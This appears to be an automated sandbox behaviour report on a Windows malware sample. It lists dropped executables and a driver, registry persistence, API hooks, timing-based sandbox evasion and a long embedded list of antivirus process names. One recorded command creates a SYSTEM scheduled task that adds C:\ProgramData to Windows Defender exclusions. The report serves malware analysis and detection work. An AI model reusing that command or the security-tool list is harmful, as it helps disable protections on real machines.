                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeSection loaded: msasn1.dll
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeSection loaded: cryptsp.dll
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeSection loaded: rsaenh.dll
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeSection loaded: cryptbase.dll
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeSection loaded: gpapi.dll
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeSection loaded: dnsapi.dll
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeSection loaded: rasadhlp.dll
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeSection loaded: fwpuclnt.dll
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeSection loaded: schannel.dll
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeSection loaded: mskeyprotect.dll
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeSection loaded: ntasn1.dll
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeSection loaded: ncrypt.dll
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeSection loaded: ncryptsslp.dll
                Source: C:\Program Files (x86)\3q7mMte5\Rpe5Ig0.exeSection loaded: kernel.appcore.dll
                Source: C:\Program Files (x86)\3q7mMte5\Rpe5Ig0.exeSection loaded: uxtheme.dll
                Source: C:\Program Files (x86)\3q7mMte5\Rpe5Ig0.exeSection loaded: tbcore3u.dll
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeSection loaded: kernel.appcore.dll
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeSection loaded: uxtheme.dll
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeSection loaded: tbcore3u.dll
                Source: C:\ProgramData\atBs3ba9\d0oKoK2T.exeSection loaded: apphelp.dll
                Source: C:\ProgramData\atBs3ba9\d0oKoK2T.exeSection loaded: wininet.dll
                Source: C:\ProgramData\atBs3ba9\d0oKoK2T.exeSection loaded: cryptbase.dll
                Source: C:\ProgramData\atBs3ba9\d0oKoK2T.exeSection loaded: ??????.dll
                Source: C:\ProgramData\atBs3ba9\d0oKoK2T.exeSection loaded: ????l.dll
                Source: C:\ProgramData\atBs3ba9\d0oKoK2T.exeSection loaded: powrprof.dll
                Source: C:\ProgramData\atBs3ba9\d0oKoK2T.exeSection loaded: umpdc.dll
                Source: C:\ProgramData\atBs3ba9\d0oKoK2T.exeSection loaded: uxtheme.dll
                Source: C:\ProgramData\atBs3ba9\d0oKoK2T.exeSection loaded: mswsock.dll
                Source: C:\ProgramData\atBs3ba9\d0oKoK2T.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\2976587-987347589.07.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
                Source: C:\Users\user\Documents\l0tiFM.exe | File written: C:\Users\Public\Music\destopbak.ini
                Source: 2976587-987347589.07.exe | Static PE information: Image base 0x140000000 > 0x60000000
                Source: 2976587-987347589.07.exe | Static file information: File size 30887936 > 1048576
                Source: 2976587-987347589.07.exe | Static PE information: Raw size of .data is bigger than: 0x100000 < 0x1d58200
                Source: 2976587-987347589.07.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: 2976587-987347589.07.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: 2976587-987347589.07.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: 2976587-987347589.07.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: 2976587-987347589.07.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: 2976587-987347589.07.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: Binary string: BootstrapPackagedGame-Win64-Shipping.pdb source: 2976587-987347589.07.exe
                Source: Binary string: d:\work\iGiveButton\toolbar4\Release_bin\uninstall.pdb source: l0tiFM.exe, 00000007.00000003.2330226957.0000000003D32000.00000004.00000020.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000000.2572435110.0000000000E98000.00000002.00000001.01000000.0000000A.sdmp, DfP1K3.exe, 0000002A.00000002.3349223878.0000000000E98000.00000002.00000001.01000000.0000000A.sdmp, DfP1K3.exe, 0000002A.00000002.3348166976.0000000000A7E000.00000004.00000020.00020000.00000000.sdmp, DfP1K3.exe, 0000002B.00000002.2616189489.0000000000E98000.00000002.00000001.01000000.0000000A.sdmp, DfP1K3.exe, 0000002B.00000000.2599264601.0000000000E98000.00000002.00000001.01000000.0000000A.sdmp, Rpe5Ig0.exe, 0000002C.00000002.2617538274.0000000000848000.00000002.00000001.01000000.0000000C.sdmp, Rpe5Ig0.exe, 0000002C.00000000.2603212393.0000000000848000.00000002.00000001.01000000.0000000C.sdmp, DfP1K3.exe, 0000002F.00000000.2618205476.0000000000E98000.00000002.00000001.01000000.0000000A.sdmp, DfP1K3.exe, 0000002F.00000002.2626427555.0000000000E98000.00000002.00000001.01000000.0000000A.sdmp, Rpe5Ig0.exe, 00000032.00000000.2963141398.0000000000848000.00000002.00000001.01000000.0000000C.sdmp, Rpe5Ig0.exe, 00000032.00000002.2970406917.0000000000848000.00000002.00000001.01000000.0000000C.sdmp, DfP1K3.exe, 00000033.00000002.2976452072.0000000000E98000.00000002.00000001.01000000.0000000A.sdmp, DfP1K3.exe, 00000033.00000000.2969401115.0000000000E98000.00000002.00000001.01000000.0000000A.sdmp
                Source: Binary string: c:\tools_git_priv\truesight\driver\objfre_win7_amd64\amd64\TrueSight.pdb source: 189atohci.sys.0.dr
                Source: Binary string: y:\avsdk5\engine\make\build\public\64-bit\vseamps.pdb source: l0tiFM.exe, 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmp, l0tiFM.exe, 00000006.00000000.2094593290.0000000140014000.00000002.00000001.01000000.00000008.sdmp, l0tiFM.exe, 00000007.00000000.2117625090.0000000140014000.00000002.00000001.01000000.00000008.sdmp, l0tiFM.exe.0.dr
                Source: 2976587-987347589.07.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: 2976587-987347589.07.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: 2976587-987347589.07.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: 2976587-987347589.07.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: 2976587-987347589.07.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                Data Obfuscation

                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exe | Unpacked PE file: 42.2.DfP1K3.exe.2820000.3.unpack
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exe | Unpacked PE file: 42.2.DfP1K3.exe.2880000.4.unpack
                Source: C:\Users\user\Documents\l0tiFM.exe | Code function: 6_2_000000014000F000 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,6_2_000000014000F000
                Source: initial sample | Static PE information: section where entry point is pointing to: .mo:
                Source: d0oKoK2T.exe.49.dr | Static PE information: real checksum: 0x0 should be: 0xa3e57
                Source: vselog.dll.0.dr | Static PE information: real checksum: 0x0 should be: 0x23f50
                Source: tbcore3U.dll.42.dr | Static PE information: real checksum: 0x0 should be: 0x4b109b
                Source: tbcore3U.dll.7.dr | Static PE information: real checksum: 0x0 should be: 0x4b0d33
                Source: lBoqoqIC.exe.42.dr | Static PE information: real checksum: 0x82c43 should be: 0x80580
                Source: 53jGFr5v.exe.42.dr | Static PE information: real checksum: 0x0 should be: 0x184de2
                Source: tbcore3U.dll.7.dr | Static PE information: section name: .%?.
                Source: tbcore3U.dll.7.dr | Static PE information: section name: .%-[
                Source: tbcore3U.dll.7.dr | Static PE information: section name: .mo:
                Source: 53jGFr5v.exe.42.dr | Static PE information: section name: .1Q[
                Source: 53jGFr5v.exe.42.dr | Static PE information: section name: .),E
                Source: 53jGFr5v.exe.42.dr | Static PE information: section name: .sc=
                Source: tbcore3U.dll.42.dr | Static PE information: section name: .%?.
                Source: tbcore3U.dll.42.dr | Static PE information: section name: .%-[
                Source: tbcore3U.dll.42.dr | Static PE information: section name: .mo:
                Source: C:\Program Files (x86)\3q7mMte5\Rpe5Ig0.exe | Code function: 44_2_00842691 push ecx; ret 44_2_008426A4
                Source: C:\ProgramData\53jGFr5v.exe | Code function: 48_2_005AE037 push esp; retf EBF3h 48_2_005AE29C
                Source: C:\ProgramData\53jGFr5v.exe | Code function: 48_2_004AD31D push ecx; ret 48_2_004AD426
                Source: C:\ProgramData\53jGFr5v.exe | Code function: 48_2_004744FA push edx; retf 48_2_00474581
                Source: C:\ProgramData\53jGFr5v.exe | Code function: 48_2_00478604 push FFFFFFEEh; ret 48_2_0047860B
                Source: C:\ProgramData\53jGFr5v.exe | Code function: 48_2_00474A42 push ds; ret 48_2_00474A79
                Source: C:\ProgramData\53jGFr5v.exe | Code function: 48_2_00474A50 push ds; ret 48_2_00474A79
                Source: C:\ProgramData\53jGFr5v.exe | Code function: 48_2_00477C14 pushfd ; retf 48_2_00477C15
                Source: C:\ProgramData\53jGFr5v.exe | Code function: 48_2_00479D21 pushfd ; retf 48_2_00479D22
                Source: C:\ProgramData\53jGFr5v.exe | Code function: 48_2_00477EB8 push 00000069h; ret 48_2_00477EC0
                Source: C:\ProgramData\53jGFr5v.exe | Code function: 48_2_00477F0D push ebx; iretd 48_2_00477F0E
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exe | Code function: 49_2_004AEF44 push eax; ret 49_2_004AEF62
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exe | Code function: 49_2_004AF620 push eax; ret 49_2_004AF64E
                Source: 53jGFr5v.exe.42.dr | Static PE information: section name: .sc= entropy: 7.9046738678249024
                Source: initial sample | Static PE information: section name: UPX0
                Source: initial sample | Static PE information: section name: UPX1

                Persistence and Installation Behavior

                Source: C:\Users\user\Desktop\2976587-987347589.07.exe | File created: C:\Users\user\Documents\l0tiFM.exe
                Source: C:\Users\user\Desktop\2976587-987347589.07.exe | File created: C:\Users\user\Documents\vselog.dll
                Source: C:\Users\user\Desktop\2976587-987347589.07.exe | File created: C:\Windows\System32\drivers\189atohci.sys
                Source: C:\Windows\System32\cmd.exe | Process created: reg.exe
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exe | File created: C:\Program Files (x86)\3q7mMte5\Rpe5Ig0.exe
                Source: C:\Users\user\Documents\l0tiFM.exe | File created: C:\Program Files (x86)\DfP1K3\DfP1K3.exe
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exe | File created: C:\Program Files (x86)\3q7mMte5\tbcore3U.dll
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exe | File created: C:\ProgramData\53jGFr5v.exe
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exe | File created: C:\ProgramData\efk2JUeS\lBoqoqIC.exe
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exe | File created: C:\ProgramData\atBs3ba9\d0oKoK2T.exe
                Source: C:\Users\user\Documents\l0tiFM.exe | File created: C:\Program Files (x86)\DfP1K3\tbcore3U.dll

                Boot Survival

                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exe | Key value created or modified: HKEY_CURRENT_USER\System\CurrentControlSet\Services\Sauron Groupfenzhu
                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exe | Registry key created: HKEY_CURRENT_USER\System\CurrentControlSet\Services\Sauron
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exe | Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W32Time\TimeProviders\NtpClient
                Source: C:\Users\user\Documents\l0tiFM.exe | Code function: 6_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,6_2_0000000140001520

                Hooking and other Techniques for Hiding and Protection

                Source: C:\Users\user\Documents\l0tiFM.exe | Memory written: PID: 6756 base: 7FFBCB910008 value: E9 EB D9 E9 FF
                Source: C:\Users\user\Documents\l0tiFM.exe | Memory written: PID: 6756 base: 7FFBCB7AD9F0 value: E9 20 26 16 00
                Source: C:\Users\user\Documents\l0tiFM.exe | Memory written: PID: 4064 base: 7FFBCB910008 value: E9 EB D9 E9 FF
                Source: C:\Users\user\Documents\l0tiFM.exe | Memory written: PID: 4064 base: 7FFBCB7AD9F0 value: E9 20 26 16 00
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exe | Memory written: PID: 7124 base: 5F0005 value: E9 8B 2F E7 76
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exe | Memory written: PID: 7124 base: 77462F90 value: E9 7A D0 18 89
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exe | Memory written: PID: 7124 base: 9E0005 value: E9 8B 2F A8 76
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exe | Memory written: PID: 7124 base: 77462F90 value: E9 7A D0 57 89
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exe | Memory written: PID: 4472 base: 4E0005 value: E9 8B 2F F8 76
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exe | Memory written: PID: 4472 base: 77462F90 value: E9 7A D0 07 89
                Source: C:\Program Files (x86)\3q7mMte5\Rpe5Ig0.exe | Memory written: PID: 5420 base: 1100005 value: E9 8B 2F 36 76
                Source: C:\Program Files (x86)\3q7mMte5\Rpe5Ig0.exe | Memory written: PID: 5420 base: 77462F90 value: E9 7A D0 C9 89
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exe | Memory written: PID: 1308 base: 1800005 value: E9 8B 2F C6 75
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exe | Memory written: PID: 1308 base: 77462F90 value: E9 7A D0 39 8A
                Source: C:\Program Files (x86)\3q7mMte5\Rpe5Ig0.exe | Memory written: PID: 2388 base: FD0005 value: E9 8B 2F 49 76
                Source: C:\Program Files (x86)\3q7mMte5\Rpe5Ig0.exe | Memory written: PID: 2388 base: 77462F90 value: E9 7A D0 B6 89
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exe | Memory written: PID: 2076 base: BB0005 value: E9 8B 2F 8B 76
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exe | Memory written: PID: 2076 base: 77462F90 value: E9 7A D0 74 89
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exe | Code function: 49_2_004746A5 IsIconic,Sleep,49_2_004746A5
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exe | Code function: 49_2_004D1946 IsWindowVisible,IsIconic,49_2_004D1946
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exe | Code function: 49_2_0046E9D4 __EH_prolog,IsWindow,IsWindow,IsWindowVisible,IsWindow,IsIconic,49_2_0046E9D4
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exe | Code function: 49_2_004A6DC1 MonitorFromWindow,IsIconic,GetWindowPlacement,GetWindowRect,49_2_004A6DC1
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exe | Code function: 49_2_0045BE4B __EH_prolog,GetClientRect,GetWindowRect,IsIconic,IsWindowVisible,IsWindow,IsWindow,IsWindow,GetNextDlgTabItem,InvalidateRect,49_2_0045BE4B
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exe | Code function: 49_2_004D4165 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,49_2_004D4165
                Source: C:\Users\user\Documents\l0tiFM.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\ProgramData\atBs3ba9\d0oKoK2T.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exe | Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess graph_49-119721
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exe | Stalling execution: Execution stalls by calling Sleep graph_49-120210
                Source: DfP1K3.exe, 0000002A.00000002.3352086562.00000000032BD000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: {4E062DDA-444A-A2A8-84CE-E105F66A5AB3}SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEMCONSENTPROMPTBEHAVIORADMINSOFTWARE\PERFRPOOLSOFTWARE\PPFR49/56/235/24;9161POSTDATAC:\WINDOWS\SYSWOW64\DRIVERS\189ATOHCI.SYS360SAFE.EXE360SD.EXE360RP.EXE360RPS.EXESRAGENT.EXE360TRAY.EXEZHUDONGFANGYU.EXEKANKAN.EXESUPERKILLER.EXELIVEUPDATE360.EXEMODULEUPDATE.EXEFILESMASHER.EXEAGREEMENTVIEWER.EXESOFTMGRLITE.EXE360LEAKFIXER.EXE360SDRUN.EXE360SDUPD.EXE360FILEGUARD.EXEDEP360.EXEDUMPUPER.EXEDSMAIN.EXEDSMAIN64.EXEFIRSTAIDBOX.EXECHECKSM.EXEHIPSMAIN.EXEHIPSDAEMON.EXEHIPSTRAY.EXEHRUPDATE.EXEHIPSLOG.EXENETFLOW.EXEAUTORUNS.EXEUSYSDIAG.EXEWSCTRLSVC.EXEWSCTRL.EXEKXEMAIN.EXEKXESCORE.EXEKSCAN.EXEKXECENTER.EXEKXETRAY.EXEKDINFOMGR.EXEKISLIVE.EXEKNEWVIP.EXEKSOFTPURIFIER.EXEKTRASHAUTOCLEAN.EXEKAUTHORITYVIEW.EXETQCLIENT.EXETQEDRNAME.EXETQSAFEUI.EXETQTRAY.EXETRANTORAGENT.EXETQDEFENDER.EXETQUPDATEUI.EXETQWATERMARK.EXEDLPAPPDATA.EXENACLDIS.EXEMSMPENG.EXEMPCMDRUN.EXELDSHELPER.EXELDSSECURITY.EXELDSSECURITYAIDER.EXECOMPUTERZTRAY.EXECOMPUTERCENTER.EXEGUARDHP.EXECOMPUTERZ_CN.EXECOMPUTERZSERVICE.EXECOMPUTERZSERVICE_X64.EXEHDW_DISK_SCAN.EXECOMPUTERZMONHELPER.EXEDRVMGR.EXEWEB_HOST.EXE2345SAFECENTERSVC.EXE2345RTPROTECT.EXE2345SAFESVC.EXE2345MPCSAFE.EXE2345SAFETRAY.EXE2345SAFEUPDATE.EXE2345VIRUSSCAN.EXE2345MANUUPDATE.EXE2345ADRTPROTECT.EXE2345AUTHORITYPROTECT.EXE2345EXTSHELL.EXE2345EXTSHELL64.EXE2345FILESHRE.EXE2345LEAKFIXER.EXE2345LSPFIX.EXE2345PCSAFEBOOTASSISTANT.EXE2345RTPROTECTCENTER.EXE2345SHELLPRO.EXE2345SYSDOCTOR.EXELENOVOPCMANAGERSERVICE.EXELENOVOPCMANAGER.EXELAVSERVICE.EXELENOVOTRAY.EXELNVSVCFDN.EXEWSCTRL7.EXEWSCTRL10.EXEWSCTRL11.EXELENOVOAPPUPDATE.EXELENOVOAPPSTORE.EXEDESKTOPASSISTANTAPP.EXEDESKTOPASSISTANT.EXELENOVOMONITORMANAGER.EXELENOVOOKM.EXELEASHIVE.EXESTARTUPMANAGER.EXEWSPLUGINHOST.EXEWSPLUGINHOST64.EXECRASHPAD_HANDLER.EXESEARCHENGINE.EXELISFSERVI
CE.EXELSF.EXEAPPVANT.EXELENOVOINTERNETSOFTWAREFRAMEWORK.EXEEMDRIVERASSIST.EXELEAPPOM.EXEHOTFIXPLATFORM.EXEMSPCMANAGER.EXEMSPCMANAGERSERVICE.EXEAVP.EXEAVPUI.EXEAVASTSVC.EXEASWTOOLSSVC.EXEASWIDSAGENT.EXEWSC_PROXY.EXEAVASTUI.EXEAVIRA.SPOTLIGHT.SERVICE.EXEENDPOINTPROTECTION.EXESENTRYEYE.EXEAVIRA.SPOTLIGHT.COMMON.UPDATER.EXEAVIRA.SPOTLIGHT.FALLBACKUPDATER.EXEAVIRA.SPOTLIGHT.UI.APPLICATION.EXEAVIRA.SPOTLIGHT.SYSTRAY.APPLICATION.EXEAVIRA.OPTIMIZERHOST.EXEAVIRA.SPOTLIGHT.BOOTSTRAPPER.EXEAVIRA.SPOTLIGHT.SERVICE.WORKER.EXEAVIRA.SPOTLIGHT.COMMON.UPDATERTRACKER.EXEAVIRA.SPOTLIGHT.UI.APPLICATION.MESSAGING.EXEAVIRA.SPOTLIGHT.UI.ADMINISTRATIVERIGHTSPROVIDER.EXEMFEMMS.EXEMFEVTPS.EXEMCAPEXE.EXEMCSHIELD.EXEMCUICNT.EXEMFEAVSVC.EXENISSRV.EXESECURITYHEALTHSYSTRAY.EXEKWSPROTECT64.EXEQMDL.EXEQMPERSONALCENTER.EXEQQPCPATCH.EXEQQPCREALTIMESPEEDUP.EXEQQPCRTP.EXEQQPCTRAY.EXEQQREPAIR.EXEQQPCMGRUPDATE.EXEKSAFETRAY.EXEMPCOPYACCELERATOR.EXEUNTHREAT.EXEK7TSECURITY.EXEAD-WATCH.EXEPSAFESYSTRAY.EXEVSSERV.EXEREMUPD.EXERTVSCAN.EXEASHDISP.EXEAVCENTER.EXETMBMSRV.EXEKNSDTRAY.EXEV3SVC.EXEMSSECESS.EXEQUHLPSVC.EXERAVMOND.EXEKVMONXP.EXEBAIDUSAFETRAY.EXEBAIDUSD.EXEBKA.EXEBKA
                Source: DfP1K3.exe, 0000002A.00000002.3352086562.00000000032BD000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: AUTORUNS.EXE
                Source: C:\Users\user\Desktop\2976587-987347589.07.exeRDTSC instruction interceptor: First address: 1400010D3 second address: 1400010EA instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec eax 0x0000000a mov ecx, eax 0x0000000c nop 0x0000000d nop 0x0000000e dec eax 0x0000000f xor edx, edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 fldpi 0x00000015 frndint 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\2976587-987347589.07.exeRDTSC instruction interceptor: First address: 1400010EA second address: 1400010EA instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 xor ebx, ebx 0x00000009 dec eax 0x0000000a mov ebx, edx 0x0000000c dec eax 0x0000000d or eax, ebx 0x0000000f dec eax 0x00000010 sub eax, ecx 0x00000012 nop 0x00000013 dec ebp 0x00000014 xor edx, edx 0x00000016 dec esp 0x00000017 mov edx, eax 0x00000019 dec ebp 0x0000001a cmp edx, eax 0x0000001c jc 00007F69D0E6B510h 0x0000001e fldpi 0x00000020 frndint 0x00000022 rdtsc
                Source: C:\Users\user\Documents\l0tiFM.exeRDTSC instruction interceptor: First address: 5E1705 second address: 5E1713 instructions: 0x00000000 rdtsc 0x00000002 dec esp 0x00000003 mov ecx, edx 0x00000005 dec ecx 0x00000006 shl ecx, 20h 0x00000009 dec esp 0x0000000a or ecx, eax 0x0000000c frndint 0x0000000e rdtsc
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_004FD450 rdtsc 48_2_004FD450
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: EnumServicesStatusA,EnumServicesStatusA,GetLastError,EnumServicesStatusA,SetLastError,49_2_00401DAB
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeThread delayed: delay time: 922337203685477
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeThread delayed: delay time: 180000
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeThread delayed: delay time: 6001668
                Source: C:\Users\user\Desktop\2976587-987347589.07.exeDropped PE file which has not been started: C:\Windows\System32\drivers\189atohci.sysJump to dropped file
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_49-119831
                Source: C:\Program Files (x86)\3q7mMte5\Rpe5Ig0.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_44-3261
                Source: C:\Users\user\Documents\l0tiFM.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_6-14031
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_49-119716
                Source: C:\Users\user\Documents\l0tiFM.exeAPI coverage: 2.7 %
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeAPI coverage: 8.1 %
                Source: C:\Users\user\Documents\l0tiFM.exe TID: 2920Thread sleep time: -48000s >= -30000sJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exe TID: 6752Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exe TID: 3528Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exe TID: 3776Thread sleep time: -40000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exe TID: 1452Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exe TID: 3908Thread sleep count: 38 > 30Jump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exe TID: 5996Thread sleep count: 69 > 30Jump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exe TID: 5996Thread sleep time: -34500s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exe TID: 3908Thread sleep count: 42 > 30Jump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exe TID: 908Thread sleep time: -39000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exe TID: 7108Thread sleep count: 61 > 30Jump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exe TID: 7108Thread sleep time: -30500s >= -30000sJump to behavior
                Source: C:\ProgramData\53jGFr5v.exe TID: 1980Thread sleep time: -39000s >= -30000s
                Source: C:\ProgramData\53jGFr5v.exe TID: 6728Thread sleep time: -45000s >= -30000s
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exe TID: 5080Thread sleep time: -922337203685477s >= -30000s
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exe TID: 1264Thread sleep time: -180000s >= -30000s
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exe TID: 3788Thread sleep time: -6001668s >= -30000s
                Source: C:\Users\user\Documents\l0tiFM.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\ProgramData\53jGFr5v.exeLast function: Thread delayed
                Source: C:\ProgramData\atBs3ba9\d0oKoK2T.exeLast function: Thread delayed
                Source: C:\Users\user\Documents\l0tiFM.exeCode function: 6_2_00007FFBC320A1B8 FindFirstFileExW,6_2_00007FFBC320A1B8
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_004C5A33 __EH_prolog,GetFullPathNameA,lstrcpyn,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpy,49_2_004C5A33
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_004A1C80 FindFirstFileA,FindFirstFileA,FindFirstFileA,FindClose,49_2_004A1C80
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_004A04A0 FindFirstFileA,FileTimeToLocalFileTime,FileTimeToDosDateTime,FindClose,49_2_004A04A0
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_00408EFE __EH_prolog,GetFileAttributesA,lstrcpy,FindFirstFileA,FindClose,49_2_00408EFE
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_00408E80 __EH_prolog,FindFirstFileA,FindClose,49_2_00408E80
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_00409040 __EH_prolog,GetFullPathNameA,lstrcpyn,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpy,49_2_00409040
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_0040935F __EH_prolog,FindFirstFileA,FindFirstFileA,IsWindow,InterlockedIncrement,FindNextFileA,FindClose,FindFirstFileA,IsWindow,InterlockedIncrement,FindNextFileA,FindClose,49_2_0040935F
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_0040E79C __EH_prolog,FindFirstFileA,FindClose,49_2_0040E79C
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_004CA859 FindFirstFileA,FindClose,49_2_004CA859
